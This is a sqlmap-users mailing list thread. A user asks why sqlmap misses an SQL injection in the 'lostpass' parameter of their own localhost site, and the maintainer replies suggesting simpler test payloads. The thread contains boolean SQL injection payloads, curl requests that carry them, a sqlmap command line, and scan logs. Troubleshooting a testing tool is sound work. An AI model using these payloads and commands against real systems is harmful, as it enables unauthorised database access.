Hi.
This looks strange:
1'%20OR 1=1 AND 1='1
and
1' OR 1=1 AND 1='2
Could you please try to find the simplest vectors/payloads that work, e.g.:
1' AND '1'='1
1' AND '1'='2
>From this payloads I am not sure why is there OR 1=1 and how is this
evaluated to True or False (as OR 1=1 should evaluate in normal cases to
True in both vectors you've sent)
Kind regards
On Sat, Jan 7, 2012 at 5:10 PM, cats <d...@alcor.se> wrote:
> Ok so I know that my site has an sqli (and boolean/mysql time based).
> I even tried both of them myself and the results are very clear and
> simple, yet sqlmap doesn't seem to see it. It can find the time based at
> first, but it always ends up saying that it's a false positive.
>
> cURL will give me the following result from the page, using "and boolean
> based sqli" with a true statement:
>
> curl --data "lostpass=1'%20OR 1=1 AND 1='1"
> http://localhost/account/index.php
>
> <div class='message' style='padding:10px;'>Your password was e-mailed to
> 1' OR 1='1</div>
>
>
> And now a false one
>
> curl --data "lostpass=1' OR 1=1 AND 1='2"
> http://localhost/account/index.php
>
>
> <td class='message'>The email address you entered 1' OR 1=1 AND 1='2
> does not exist</p>
>
>
> I have tried with --string and --text-only with sqlmap, but I get the
> same results over and over. Here's some sample output:
>
> python sqlmap.py -u "http://localhost/account/index.php"; --random-agent
> --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to"
> --text-only --delay=5 --technique=TB
>
>
> [16:57:34] [INFO] testing connection to the target url
> [16:57:49] [INFO] heuristics detected web page charset 'ascii'
> [16:57:50] [INFO] testing if the provided string is within the target
> URL page content
> [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
> [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
> [16:58:13] [INFO] POST parameter 'lostpass' is dynamic
> [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass'
> might not be injectable
> [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
> [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND
> time-based blind' injectable
> [17:00:48] [INFO] checking if the injection point on POST parameter
> 'lostpass' is a false positive
> [17:03:09] [WARNING] false positive injection point detected
> [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
> [17:03:09] [CRITICAL] all parameters appear to be not injectable.
>
> I tried with a sleep(5) injection manually as well, and it works like a
> charm. Any ideas?
>
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
